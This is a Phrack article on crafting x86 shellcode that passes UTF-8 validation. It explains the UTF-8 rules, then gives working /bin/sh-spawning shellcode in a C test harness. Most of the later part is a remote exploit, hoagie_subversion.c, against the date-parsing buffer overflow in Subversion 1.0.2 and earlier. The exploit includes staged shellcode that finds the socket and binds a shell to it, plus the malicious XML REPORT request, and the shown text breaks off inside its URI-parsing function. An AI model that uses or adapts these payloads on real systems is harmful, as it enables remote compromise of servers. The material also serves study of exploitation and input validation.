Phrack 62 File 09: UTF8 Shellcode (2004)


                           ==Phrack Inc.==

              Volume 0x0b, Issue 0x3e, Phile #0x09 of 0x10

|=--------------[ Writing UTF-8 compatible shellcodes ]-----------------=|
|=----------------------------------------------------------------------=|
|=-----------[ Thomas Wana aka. greuff  <greuff@void.at> ]--------------=|
|=----------------------------------------------------------------------=|

1 - Abstract

2 - What is UTF-8?
  2.1 - UTF-8 in detail
  2.2 - Advantages of using UTF-8

3 - The need for UTF-8 compatible shellcodes
  3.1 - UTF-8 sequences
    3.1.1 - Possible sequences
    3.1.2 - UTF-8 shortest form
    3.1.3 - Valid UTF-8 sequences

4 - Creating the shellcode
  4.1 - Bytes that come in handy
    4.1.1 - Continuation bytes
    4.1.2 - Masking continuation bytes
    4.1.3 - Chaining instructions
  4.2 - General design rules
  4.3 - Testing the code

5 - A working example
  5.1 - The original shellcode
  5.2 - UTF-8-ify
  5.3 - Let's try it out
  5.4 - A real exploit using these techniques

6 - Considerations
  6.1 - Automated shellcode transformer
  6.2 - UTF-8 in XML-files

7 - Greetings, last words

----------------------------------------------------------------------------

---[ 1. Abstract

This paper deals with the creation of shellcode that is recognized as
valid by any UTF-8 parser. The problem is not unlike the alphanumeric
shellcode problem described by rix in Phrack 57 [4], but fortunately
we have many more characters available, so we can almost always build
shellcode that is valid UTF-8 and does what we want.

I will give you a brief introduction to UTF-8 and outline the
characters available for building shellcode. You will see that it's
generally possible to make any shellcode valid UTF-8, but you will have
to think quite a bit. A working example is provided at the end for
reference.

----------------------------------------------------------------------------

---[ 2. What is UTF-8?

For a really great introduction to the topic, I highly recommend reading
the "UTF-8 and Unicode FAQ" [1] by Markus Kuhn.

UTF-8 is a character encoding suitable for representing all 2^31 code
points of the original ISO 10646 (UCS) code space. (The Unicode standard
itself only uses U+0000 to U+10FFFF, which is why the table in 3.1.3
stops at four bytes.) The really neat thing about UTF-8 is
that all ASCII characters (the lower codepage in standard encodings like
ISO-8859-1 etc) are the same in UTF-8 - no conversion needed. That means,
in the best case, all your config files in /etc and every English text
document you have on your computer right now are already 100% valid UTF-8.

Unicode characters are written like this: U-0000007F, which stands for
"the 128th character in the Unicode character space" (counting starts at
U-00000000). Storing every character as such a fixed-width 32-bit value
(UCS-4) can easily represent all 2^31 code points, but it's a waste of
space (when you write English or western text) and - much more
important - makes the transition to Unicode very hard (you would have to
convert all the files you already have). "Hello" would thus be encoded
like:

   U-00000048 U-00000065 U-0000006C U-0000006C U-0000006F

which is in hex:

   \x48\x00\x00\x00 \x65\x00\x00\x00 \x6C\x00\x00\x00 \x6C\x00\x00\x00
   \x6F\x00\x00\x00

(for all you little endian friends).
What a waste of space! 20 bytes for 5 characters... The same text in
UTF-8:

   "Hello"

:-)

Let's look at the encoding in more detail.

---[ 2.1. UTF-8 in detail

UTF-8 can represent any character of that 31-bit space in a UTF-8
sequence of 1 to 6 bytes.

As I already mentioned before, the characters in the lower codepage 
(ASCII-code) are the same in Unicode - they have the character values
U-00000000 - U-0000007F. You therefore still only need 7 bits to
represent all possible values. UTF-8 says, if you only need up to 7
bits for your character, stuff it into one byte and you are fine.

Unicode-characters that have higher values than U-0000007F must be
mapped to two or more bytes, as shown in the table below:

U-00000000 - U-0000007F: 0xxxxxxx  
U-00000080 - U-000007FF: 110xxxxx 10xxxxxx 
U-00000800 - U-0000FFFF: 1110xxxx 10xxxxxx 10xxxxxx
U-00010000 - U-001FFFFF: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
U-00200000 - U-03FFFFFF: 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
U-04000000 - U-7FFFFFFF: 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx

Example: U-000000C4 (LATIN CAPITAL LETTER A WITH DIAERESIS)

This character's value is between U-00000080 and U-000007FF, so we
have to encode it using 2 bytes. 0xC4 is 11000100 binary. UTF-8 fills
up the places marked 'x' above with these bits, beginning at the
least significant bit.

    110xxxxx 10xxxxxx
+         11   000100
    -----------------
    11000011 10000100

which results in 0xC3 0x84 in UTF-8.

Example: U-0000211C (BLACK-LETTER CAPITAL R)

The same here. According to the table above, we need 3 bytes to encode
this character.

0x211C is 00100001 00011100 binary. Let's fill up the spaces:

    1110xxxx 10xxxxxx 10xxxxxx
+       0010   000100   011100
    --------------------------
    11100010 10000100 10011100

which is 0xE2 0x84 0x9C in UTF-8.

I hope you get the point now :-)
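
The bit filling shown in the two examples can also be written down as a
few lines of C. This is only a minimal sketch of the 1-to-6-byte scheme
from the table above; the function name utf8_encode and its interface are
made up for this illustration and do not come from any library.

```c
#include <stddef.h>
#include <stdint.h>

/* Encode code point cp (< 2^31) into out[], following the table above.
 * Returns the number of bytes written (1..6), or 0 if cp is out of range.
 * Hypothetical helper, not part of any standard library. */
size_t utf8_encode(uint32_t cp, unsigned char out[6])
{
    /* Largest value that fits into a sequence of 1, 2, ... 6 bytes */
    static const uint32_t limit[6] = {
        0x7F, 0x7FF, 0xFFFF, 0x1FFFFF, 0x3FFFFFF, 0x7FFFFFFF
    };
    /* Marker bits of the first byte for each sequence length */
    static const unsigned char lead[6] = {
        0x00, 0xC0, 0xE0, 0xF0, 0xF8, 0xFC
    };
    size_t len, i;

    /* Pick the shortest length whose limit is large enough */
    for (len = 1; len <= 6 && cp > limit[len - 1]; len++)
        ;
    if (len > 6)
        return 0;

    /* Fill the continuation bytes, least significant bits first */
    for (i = len - 1; i > 0; i--) {
        out[i] = (unsigned char)(0x80 | (cp & 0x3F));
        cp >>= 6;
    }
    /* Whatever is left goes into the 'x' bits of the first byte */
    out[0] = (unsigned char)(lead[len - 1] | cp);
    return len;
}
```

Calling utf8_encode(0xC4, buf) should leave 0xC3 0x84 in buf, and
utf8_encode(0x211C, buf) should leave 0xE2 0x84 0x9C, matching the two
hand-worked examples.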

---[ 2.2. Advantages of using UTF-8

UTF-8 combines the flexibility of Unicode (think of it: no more codepages
mess!) with the ease-of-use of traditional encodings. Also, the transition
to complete worldwide UTF-8 support is easy to do, because every plain-
7-bit-ASCII-file that exists right now (and existed since the 60s) will
be valid in the future too, without any modifications. Think of all your
config files!

----------------------------------------------------------------------------

---[ 3. The need for UTF-8 compatible shellcodes

So, since we know now that UTF-8 is going to save our day in the future,
why would we need shellcodes that are valid UTF-8 texts?

Well, UTF-8 is the default encoding for XML, and since more and more
protocols start using XML and more and more networking daemons use these
protocols, the chance of finding a vulnerability in such a program
increases. Additionally, applications start to pass user input around
encoded in UTF-8. So sooner or later, you will overflow a buffer with
UTF-8 data. Now you want that data to be executable AND valid UTF-8.

---[ 3.1. UTF-8 sequences

Fortunately, the situation is not _that_ desperate, compared to
alphanumeric shellcodes. There, we only have a very limited character
set, and this really limits the instructions available. With UTF-8, we
have a much bigger character space, but there is one problem: we are
limited in the _sequence_ of characters. For example, with alphanumeric
shellcodes we don't care if the sequence is "AAAC" or "CAAA" (except
for the problem, of course, that the instructions have to make sense :)).
But with UTF-8, for example, 0xBF must not follow 0x41. Only certain
bytes may follow other bytes. This is what the UTF-8 shellcode magic
is all about.

---[ 3.1.1. Possible sequences

Let's look into the available "UTF-8-codespace" more closely:

U-00000000 - U-0000007F: 0xxxxxxx = 0 - 127 = 0x00 - 0x7F
   This is much like the alphanumeric shellcodes - any character
   can follow any character, so 0x41 0x42 0x43 is no problem, for
   example.

U-00000080 - U-000007FF: 110xxxxx 10xxxxxx 
   First byte: 0xC0 - 0xDF
   Second byte: 0x80 - 0xBF
   You see the problem here. A valid sequence would be 0xCD 0x80
   (do you remember that sequence - int $0x80 :)), because the byte
   following 0xCD must be between 0x80 and 0xBF. An invalid 
   sequence would be 0xCD 0x41, every UTF-8-parser chokes on 
   this.
   
U-00000800 - U-0000FFFF: 1110xxxx 10xxxxxx 10xxxxxx
   First byte: 0xE0 - 0xEF
   Following 2 bytes: 0x80 - 0xBF
   So, if the sequence starts with 0xE0 to 0xEF, there must be
   two bytes following between 0x80 and 0xBF. Fortunately we can
   often use 0x90 here, which is nop. But more on that later.

U-00010000 - U-001FFFFF: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
   First byte: 0xF0 - 0xF7
   Following 3 bytes: 0x80 - 0xBF
   You get the point.

U-00200000 - U-03FFFFFF: 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
   First byte: 0xF8 - 0xFB
   Following 4 bytes: 0x80 - 0xBF

U-04000000 - U-7FFFFFFF: 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
   First byte: 0xFC - 0xFD
   Following 5 bytes: 0x80 - 0xBF

So we know now what bytes make up UTF-8:

0x00 - 0x7F without problems
0x80 - 0xBF only as a "continuation byte" in the middle of a sequence
0xC0 - 0xDF as a start-byte of a two-byte-sequence (1 continuation byte)
0xE0 - 0xEF as a start-byte of a three-byte-sequence (2 continuation bytes)
0xF0 - 0xF7 as a start-byte of a four-byte-sequence (3 continuation bytes)
0xF8 - 0xFB as a start-byte of a five-byte-sequence (4 continuation bytes)
0xFC - 0xFD as a start-byte of a six-byte-sequence (5 continuation bytes)
0xFE - 0xFF not usable! (these two bytes never occur in UTF-8 text; the
            sequence 0xFF 0xFE is the byte order mark of little-endian
            UTF-16, not of UTF-8)
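
The list above maps directly onto a chain of range checks. The following
is a small sketch of that classification; the name utf8_byte_role and its
return convention are assumptions chosen for this example only.

```c
/* Role of a single byte according to the list above.
 * Returns 1..6 for a start byte (the total length of its sequence),
 * 0 for a continuation byte, and -1 for 0xFE/0xFF.
 * Hypothetical helper for illustration. */
int utf8_byte_role(unsigned char b)
{
    if (b <= 0x7F) return 1;   /* plain ASCII, stands alone */
    if (b <= 0xBF) return 0;   /* continuation byte         */
    if (b <= 0xDF) return 2;   /* 110xxxxx                  */
    if (b <= 0xEF) return 3;   /* 1110xxxx                  */
    if (b <= 0xF7) return 4;   /* 11110xxx                  */
    if (b <= 0xFB) return 5;   /* 111110xx                  */
    if (b <= 0xFD) return 6;   /* 1111110x                  */
    return -1;                 /* 0xFE, 0xFF                */
}
```

Note that this only reflects the raw bit patterns. It does not yet know
about the shortest-form rule, so it still reports 0xC0 as a start byte.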

---[ 3.1.2. UTF-8 shortest form

Unfortunately (for us), the Corrigendum #1 to the Unicode standard [2]
specifies that UTF-8-parsers only accept the "UTF-8 shortest form"
as a valid sequence.

What's the problem here? 

Well, without that rule, we could encode the character U-0000000A (line
feed) in many different ways:

0x0A - this is the shortest possible form
0xC0 0x8A
0xE0 0x80 0x8A
0xF0 0x80 0x80 0x8A
0xF8 0x80 0x80 0x80 0x8A
0xFC 0x80 0x80 0x80 0x80 0x8A

Now that would be a big security problem if UTF-8 parsers accepted
_all_ the possible forms. Look at the strcmp routine - it compares two
strings byte by byte to tell if they are equal or not (that still works
this way when comparing UTF-8 strings). An attacker could generate a string
with a longer form than necessary and so bypass string comparison checks,
for example.

Because of this, UTF-8-parsers are _required_ to only accept the shortest
possible form of a sequence. This rules out sequences that start with one
of the following byte patterns:

1100000x (10xxxxxx)
11100000 100xxxxx (10xxxxxx)
11110000 1000xxxx (10xxxxxx 10xxxxxx)
11111000 10000xxx (10xxxxxx 10xxxxxx 10xxxxxx)
11111100 100000xx (10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx) 

Now certain sequences become invalid, for example 0xC0 0xAF, because
the resulting UNICODE character is not encoded in its shortest form.
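
To see why the rule matters, here is a sketch of a decoder that
deliberately omits the shortest-form check, plus a helper that compares
the length actually used with the minimum length for the decoded value.
All three function names are invented for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Decode one sequence WITHOUT the shortest-form check (what a naive
 * parser might do). Returns the sequence length, or 0 on a structural
 * error. The decoded value is stored in *cp. */
size_t utf8_decode_lenient(const unsigned char *s, size_t n, uint32_t *cp)
{
    size_t len, i;
    uint32_t v;

    if (n == 0) return 0;
    if      (s[0] < 0x80) { len = 1; v = s[0]; }
    else if (s[0] < 0xC0) return 0;          /* stray continuation byte */
    else if (s[0] < 0xE0) { len = 2; v = s[0] & 0x1F; }
    else if (s[0] < 0xF0) { len = 3; v = s[0] & 0x0F; }
    else if (s[0] < 0xF8) { len = 4; v = s[0] & 0x07; }
    else if (s[0] < 0xFC) { len = 5; v = s[0] & 0x03; }
    else if (s[0] < 0xFE) { len = 6; v = s[0] & 0x01; }
    else return 0;                           /* 0xFE, 0xFF */

    if (len > n) return 0;                   /* truncated sequence */
    for (i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0; /* not 10xxxxxx */
        v = (v << 6) | (s[i] & 0x3F);
    }
    *cp = v;
    return len;
}

/* Minimum number of bytes needed to encode cp */
size_t utf8_min_len(uint32_t cp)
{
    if (cp < 0x80)      return 1;
    if (cp < 0x800)     return 2;
    if (cp < 0x10000)   return 3;
    if (cp < 0x200000)  return 4;
    if (cp < 0x4000000) return 5;
    return 6;
}

/* 1 if the sequence at s is in shortest form, 0 otherwise */
int utf8_is_shortest(const unsigned char *s, size_t n)
{
    uint32_t cp;
    size_t len = utf8_decode_lenient(s, n, &cp);
    return len != 0 && len == utf8_min_len(cp);
}
```

With this, all six byte strings listed above decode to 0x0A, but only the
single byte 0x0A passes utf8_is_shortest(). Likewise 0xC0 0xAF decodes to
0x2F ('/') and is rejected.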

---[ 3.1.3. Valid UTF-8 sequences

Now that we know all this, we can tell which sequences are valid
UTF-8:

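Code Points          1st Byte  2nd Byte  3rd Byte  4th Byte
U+0000..U+007F       00..7F
U+0080..U+07FF       C2..DF    80..BF
U+0800..U+0FFF       E0        A0..BF    80..BF
U+1000..U+FFFF       E1..EF    80..BF    80..BF
U+10000..U+3FFFF     F0        90..BF    80..BF    80..BF
U+40000..U+FFFFF     F1..F3    80..BF    80..BF    80..BF
U+100000..U+10FFFF   F4        80..8F    80..BF    80..BF

(Later versions of the Unicode standard also exclude the surrogate range
U+D800..U+DFFF, so a strict parser additionally requires 80..9F as the
2nd byte after ED. The five- and six-byte forms from 3.1.1 are not in
this table at all, so F5..FD are not valid start bytes for such a parser.)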
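
The table can be turned into a validator almost line by line. The sketch
below does that; the function name and the "offset of the first bad
sequence" return convention are choices made for this example. One line
goes beyond the table as printed in the corrigendum: the ED case, which
current Unicode versions restrict to 80..9F in order to exclude
surrogates.

```c
#include <stddef.h>

/* Check buf[0..n-1] against the table of valid sequences.
 * Returns -1 if the whole buffer is valid, otherwise the offset of the
 * start byte of the first invalid sequence.
 * Hypothetical helper for illustration. */
long utf8_first_invalid(const unsigned char *buf, size_t n)
{
    size_t i = 0;

    while (i < n) {
        unsigned char b = buf[i];
        unsigned char lo = 0x80, hi = 0xBF; /* allowed range, 2nd byte */
        size_t len, k;

        if (b <= 0x7F)                     len = 1;
        else if (b >= 0xC2 && b <= 0xDF)   len = 2;
        else if (b == 0xE0)              { len = 3; lo = 0xA0; }
        else if (b == 0xED)              { len = 3; hi = 0x9F; } /* no surrogates
                                              (newer rule, not in the table) */
        else if (b >= 0xE1 && b <= 0xEF)   len = 3;
        else if (b == 0xF0)              { len = 4; lo = 0x90; }
        else if (b >= 0xF1 && b <= 0xF3)   len = 4;
        else if (b == 0xF4)              { len = 4; hi = 0x8F; }
        else return (long)i;  /* 80..C1 and F5..FF cannot start a sequence */

        if (len > n - i)
            return (long)i;                 /* sequence is cut off */
        if (len > 1 && (buf[i + 1] < lo || buf[i + 1] > hi))
            return (long)i;                 /* 2nd byte out of range */
        for (k = 2; k < len; k++)
            if (buf[i + k] < 0x80 || buf[i + k] > 0xBF)
                return (long)i;             /* 3rd/4th byte out of range */
        i += len;
    }
    return -1;
}
```

For the byte string 31 C9 31 DB this returns 1 (the C9 has no
continuation byte), while 31 C9 90 31 DB 90 yields -1.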

Let's look at how to build UTF-8 shellcode!

----------------------------------------------------------------------------

---[ 4. Creating the shellcode

Before you start, be sure that you are comfortable creating "standard" 
shellcode, i.e. shellcode that has no limitations in the instructions 
available. 

We know which characters we can use and that we have to pay attention to
the character sequence. Basically, we can transform any shellcode to
UTF-8 compatible shellcode, but we often need some tricks.

---[ 4.1. Bytes that come in handy

The biggest problem while building UTF-8-shellcode is that you have
to get the sequences right.

     "\x31\xc9"          // xor %ecx, %ecx
     "\x31\xdb"          // xor %ebx, %ebx

We start with \x31. No problem here, \x31 is between \x00 and \x7f,
so we don't need any more continuation bytes. \xc9 is next. Whoops -
it is between \xc2 and \xdf, so we need a continuation byte. What
byte is next? \x31 - that is not a valid continuation byte (those
have to be between \x80 and \xbf). So we have to insert an instruction
here that doesn't harm our code *and* makes the sequence UTF-8
compatible.

---[ 4.1.1. Continuation bytes

We are lucky here. The nop instruction (\x90) is the perfect
continuation byte and simply does nothing :) (exception: you can't use
it as the first continuation byte after \xe0, which needs \xa0-\xbf
there, or after \xf4, which needs \x80-\x8f - see the table in 3.1.3).

So to handle the problem above, we would simply do the following:

     "\x31\xc9"          // xor %ecx, %ecx
     "\x90"              // nop (UTF-8)
     "\x31\xdb"          // xor %ebx, %ebx
     "\x90"              // nop (UTF-8)

(I always mark bytes I inserted because of UTF-8 so I don't accidentally
optimize them away later when I need to save space)

---[ 4.1.2. Masking continuation bytes

The other way round, you often have instructions that start with a
continuation byte, i.e. the first byte of the instruction is between
\x80 and \xbf:

     "\x8d\x0c\x24"      // lea (%esp,1),%ecx

That means you have to find an instruction that is only one byte long
and lies between \xc2 and \xdf.

The most suitable one I found here is SALC [3]. This is an *undocumented*
Intel opcode, but every Intel CPU (and compatible) supports it in 32-bit
mode (it is not a valid opcode in 64-bit mode). The funny thing is that
even gdb reports an "invalid opcode" there. But it works :) The opcode
of SALC is \xd6 so it suits our purpose well.

The bad thing is that it has side effects. This instruction modifies
%al depending on the carry flag (see [3] for details). So always think
about what happens to your %eax register when you insert this instruction!

Back to the example, the following modification makes the sequence valid
UTF-8:

     "\xd6"              // salc (UTF-8)
     "\x8d\x0c\x24"      // lea (%esp,1),%ecx

---[ 4.1.3. Chaining instructions

If you are lucky, instructions that begin with continuation bytes follow
instructions that need continuation bytes, so you can chain them together,
without inserting extra bytes.

You can often save space this way just by rearranging instructions, so
think about it when you are short of space.

---[ 4.2. General design rules

%eax is evil. Try to avoid using it in instructions that use it as a
parameter because the instruction then often contains \xc0 (for example,
xor %eax,%eax assembles to \x31\xc0), which is invalid in UTF-8. Use
something like

    xor %ebx, %ebx
    push %ebx
    pop %eax

(pop %eax has an instruction code of its own - and a very UTF-8 friendly
one, too :)

---[ 4.3. Testing the code

How can you test the code? Use iconv, it comes with glibc. You
basically convert the UTF-8 to UTF-16, and if there are no error
messages then the string is valid UTF-8. (Why UTF-16? UTF-8 sequences
can yield character codes well beyond 0xFF, so the conversion could
fail for a different reason if you converted to LATIN1 or ASCII.
Drove me nuts some time ago, because I always thought my UTF-8 was
wrong...)

First, invalid UTF-8:

greuff@pluto:/tmp$ hexdump -C test
00000000  31 c9 31 db                                       |1.1.|
00000004
greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 test
ÿþ1iconv: illegal input sequence at position 1
greuff@pluto:/tmp$

And now valid UTF-8:

greuff@pluto:/tmp$ hexdump -C test
00000000  31 c9 90 31 db 90                                 |1..1..|
00000006
greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 test
ÿþ1P1Ðgreuff@pluto:/tmp$
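
The same check can be run from C through the iconv(3) interface that the
command line tool is built on. This is a sketch under the assumption of a
glibc-style iconv whose second argument is a char **; the wrapper name
iconv_accepts_utf8 is made up for this example, and on systems where iconv
lives in a separate library you may need to link with -liconv.

```c
#include <errno.h>
#include <iconv.h>
#include <stddef.h>

/* Returns 1 if iconv accepts buf as UTF-8, 0 if it reports an illegal
 * or incomplete sequence, -1 if the converter could not be opened.
 * Hypothetical wrapper around the real iconv_open/iconv/iconv_close. */
int iconv_accepts_utf8(const unsigned char *buf, size_t n)
{
    char out[256];
    char *in = (char *)buf;      /* iconv does not modify the input */
    size_t inleft = n;
    int ok = 1;
    iconv_t cd = iconv_open("UTF-16", "UTF-8");   /* to, from */

    if (cd == (iconv_t)-1)
        return -1;

    while (inleft > 0) {
        char *outp = out;
        size_t outleft = sizeof(out);

        if (iconv(cd, &in, &inleft, &outp, &outleft) == (size_t)-1
                && errno != E2BIG) {
            ok = 0;              /* EILSEQ or EINVAL */
            break;
        }
        /* E2BIG only means out[] is full; the converted text is not
         * needed here, so the buffer is simply reused */
    }
    iconv_close(cd);
    return ok;
}
```

The converted output is thrown away on purpose, since only the error
status is of interest here.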

----------------------------------------------------------------------------

---[ 5. A working example

Now onto something practical. Let's convert a classical /bin/sh-spawning
shellcode to UTF-8.

---[ 5.1. The original shellcode

    "\x31\xd2"                // xor    %edx,%edx
    "\x52"                    // push   %edx
    "\x68\x6e\x2f\x73\x68"    // push   $0x68732f6e
    "\x68\x2f\x2f\x62\x69"    // push   $0x69622f2f
    "\x89\xe3"                // mov    %esp,%ebx
    "\x52"                    // push   %edx
    "\x53"                    // push   %ebx
    "\x89\xe1"                // mov    %esp,%ecx
    "\xb8\x0b\x00\x00\x00"    // mov    $0xb,%eax
    "\xcd\x80"                // int    $0x80

The code simply prepares the stack in the right way, sets some registers
and jumps into kernel space (int $0x80).

---[ 5.2. UTF-8-ify

That's an easy example, no big obstacles here. The only obvious problem
is the "mov $0xb,%eax" instruction: it starts with \xb8, a continuation
byte, and contains NUL bytes. I am quite lazy now, so I'll just
copy %edx (which is guaranteed to contain 0 at this time) to %eax via
push/pop and increase it 11 times :)

The new shellcode looks like this (wrapped into a C program so you
can try it out):

----------8<------------8<-------------8<------------8<---------------
#include <stdio.h>

char shellcode[]=
    "\x31\xd2"                // xor    %edx,%edx
    "\x90"                    // nop (UTF-8 - because previous byte was 0xd2)
    "\x52"                    // push   %edx
    "\x68\x6e\x2f\x73\x68"    // push   $0x68732f6e
    "\x68\x2f\x2f\x62\x69"    // push   $0x69622f2f
    "\xd6"                    // salc (UTF-8 - because next byte is 0x89)
    "\x89\xe3"                // mov    %esp,%ebx
    "\x90"                    // nop (UTF-8 - two nops because of 0xe3)
    "\x90"                    // nop (UTF-8)
    "\x52"                    // push   %edx
    "\x53"                    // push   %ebx
    "\xd6"                    // salc (UTF-8 - because next byte is 0x89)
    "\x89\xe1"                // mov    %esp,%ecx
    "\x90"                    // nop (UTF-8 - same here)
    "\x90"                    // nop (UTF-8)
    "\x52"                    // push %edx
    "\x58"                    // pop %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\xcd\x80"                // int    $0x80
    ;

void main()
{
   int *ret;
   FILE *fp;
   fp=fopen("out","w");
   fwrite(shellcode,strlen(shellcode),1,fp);
   fclose(fp);
   ret=(int *)(&ret+2);
   *ret=(int)shellcode;
}
----------8<------------8<-------------8<------------8<---------------

As you can see, I used nop's as continuation bytes as well as salc
to mask out continuation bytes. You'll quickly get an eye for this
if you do it often.

---[ 5.3. Let's try it out

greuff@pluto:/tmp$ gcc test.c -o test
test.c: In function `main':
test.c:37: warning: return type of `main' is not `int'
greuff@pluto:/tmp$ ./test
sh-2.05b$ exit
exit
greuff@pluto:/tmp$ hexdump -C out
00000000  31 d2 90 52 68 6e 2f 73  68 68 2f 2f 62 69 d6 89  |1..Rhn/shh//bi..|
00000010  e3 90 90 52 53 d6 89 e1  90 90 52 58 40 40 40 40  |...RS.....RX@@@@|
00000020  40 40 40 40 40 40 40 cd  80                       |@@@@@@@..|
00000029
greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 out && echo valid!
ÿþ1Rhn/shh//bi4RSRX@@@@@@@@@@@@valid!
greuff@pluto:/tmp$

Hooray! :-)

---[ 5.4. A real exploit using these techniques

The recent date parsing buffer overflow in Subversion <= 1.0.2 led
me to research these problems and write the following exploit.
It isn't 100% finished; but it works against svn:// and http:// URLs.
The first shellcode stage is a hand crafted UTF-8-shellcode, that
searches for the socket file descriptor and loads a second stage shellcode
from the exploit and executes it. A real life example showing you that
these things actually work :)

----------8<------------8<-------------8<------------8<---------------
/*****************************************************************
 * hoagie_subversion.c
 *
 * Remote exploit against Subversion-Servers.
 *
 * Author: greuff <greuff@void.at>
 *
 * Tested on Subversion 1.0.0 and 0.37
 *
 * Algorithm:
 * This is a two-stage exploit. The first stage overflows a buffer
 * on the stack and leaves us ~60 bytes of machine code to be
 * executed. We try to find the socket-fd there and then do a 
 * read(2) on the socket. The exploit then sends the second stage
 * loader to the server, which can be of any length (up to the
 * obvious limits, of course). This second stage loader spawns 
 * /bin/sh on the server and connects it to the socket-fd.
 *
 * Credits:
 *    void.at
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
 * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
 * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
 *
 *****************************************************************/

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

enum protocol { SVN, SVNSSH, HTTP, HTTPS };

char stage1loader[]=
             // begin socket fd search
             "\x31\xdb"            // xor %ebx, %ebx
             "\x90"                // nop (UTF-8)
             "\x53"                // push %ebx
             "\x58"                // pop %eax
             "\x50"                // push %eax
             "\x5f"                // pop %edi                # %eax = %ebx = %edi = 0
             "\x2c\x40"            // sub $0x40, %al
             "\x50"                // push %eax
             "\x5b"                // pop %ebx
             "\x50"                // push %eax
             "\x5a"                // pop %edx                # %ebx = %edx = 0xC0
             "\x57"                // push %edi
             "\x57"                // push %edi               # safety-0
             "\x54"                // push %esp
             "\x59"                // pop %ecx                # %ecx = pointer to the buffer
             "\x4b"                // dec %ebx                # beginloop:
             "\x57"                // push %edi
             "\x58"                // pop %eax                # clear %eax
             "\xd6"                // salc (UTF-8)
             "\xb0\x60"            // movb $0x60, %al
             "\x2c\x44"            // sub $0x44, %al          # %eax = 0x1C
             "\xcd\x80"            // int $0x80               # fstat(i, &stat)
             "\x58"                // pop %eax
             "\x58"                // pop %eax
             "\x50"                // push %eax
             "\x50"                // push %eax
             "\x38\xd4"            // cmp %dl, %ah            # uppermost 2 bits of st_mode set?
             "\x90"                // nop (UTF-8)
             "\x72\xed"            // jb beginloop
             "\x90"                // nop (UTF-8)
             "\x90"                // nop (UTF-8)             # %ebx now contains the socket fd
             // begin read(2)
             "\x57"                // push %edi
             "\x58"                // pop %eax                # zero %eax
             "\x40"                // inc %eax
             "\x40"                // inc %eax
             "\x40"                // inc %eax                # %eax=3
             //"\x54"                // push %esp
             //"\x59"                // pop %ecx                # %ecx ... address of buffer
             //"\x54"                // push %edi
             //"\x5a"                // pop %edx                # %edx ... bufferlen (0xC0)
             "\xcd\x80"            // int $0x80               # read(2) second stage loader
             "\x39\xc7"            // cmp %eax, %edi
             "\x90"                // nop (UTF-8)
             "\x7f\xf3"            // jg startover
             "\x90"                // nop (UTF-8)
             "\x90"                // nop (UTF-8)
             "\x90"                // nop (UTF-8)
             "\x54"                // push %esp
             "\xc3"                // ret                     # execute second stage loader
             "\x90"                // nop (UTF-8)
             "\0"    // %ebx still contains the fd we can use in the 2nd stage loader.
             ;

char stage2loader[]=
             // dup2 - %ebx contains the fd
             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
             "\xb9\x00\x00\x00\x00"   // mov $0x0, %ecx
             "\xcd\x80"               // int $0x80
             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
             "\xb9\x01\x00\x00\x00"   // mov $0x1, %ecx
             "\xcd\x80"               // int $0x80
             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
             "\xb9\x02\x00\x00\x00"   // mov $0x2, %ecx
             "\xcd\x80"               // int $0x80
             // start /bin/sh
             "\x31\xd2"               // xor %edx, %edx
             "\x52"                   // push %edx
             "\x68\x6e\x2f\x73\x68"   // push $0x68732f6e
             "\x68\x2f\x2f\x62\x69"   // push $0x69622f2f
             "\x89\xe3"               // mov %esp, %ebx
             "\x52"                   // push %edx
             "\x53"                   // push %ebx
             "\x89\xe1"               // mov %esp, %ecx
             "\xb8\x0b\x00\x00\x00"   // mov $0xb, %eax
             "\xcd\x80"               // int $0x80
             "\xb8\x01\x00\x00\x00"   // mov $0x1, %eax
             "\xcd\x80"               // int %0x80     (exit)
             ;

int stage2loaderlen=69;
             
char requestfmt[]=
"REPORT %s HTTP/1.1\n"
"Host: %s\n"
"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n"
"Content-Length: %d\n"
"Content-Type: text/xml\n"
"Connection: close\n\n"
"%s\n";

char xmlreqfmt[]=
"<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">"
"<D:creationdate>%s%c%c%c%c</D:creationdate>"
"</S:dated-rev-report>";

int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000])
{
   char *ptr;
   char bfr[1000];
   
   ptr=strstr(uri,"://");
   if(!ptr) return -1;
   *ptr=0;
   snprintf(bfr,sizeof(bfr),"%s",uri);
   if(!strcmp(bfr,"http"))
      *proto=HTTP, *port=80;
   else if(!strcmp(bfr,"svn"))
      *proto=SVN, *port=3690;
   else
   {
      printf("Unsupported protocol %s\n",bfr);
      return -1;
   }
   uri=ptr+3;
   if((ptr=strchr(uri,':')))
   {
      *ptr=0;
      snprintf(host,1000,"%s",uri);
      uri=ptr+1;
      if((ptr=strchr(uri,'/'))==NULL) return -1;
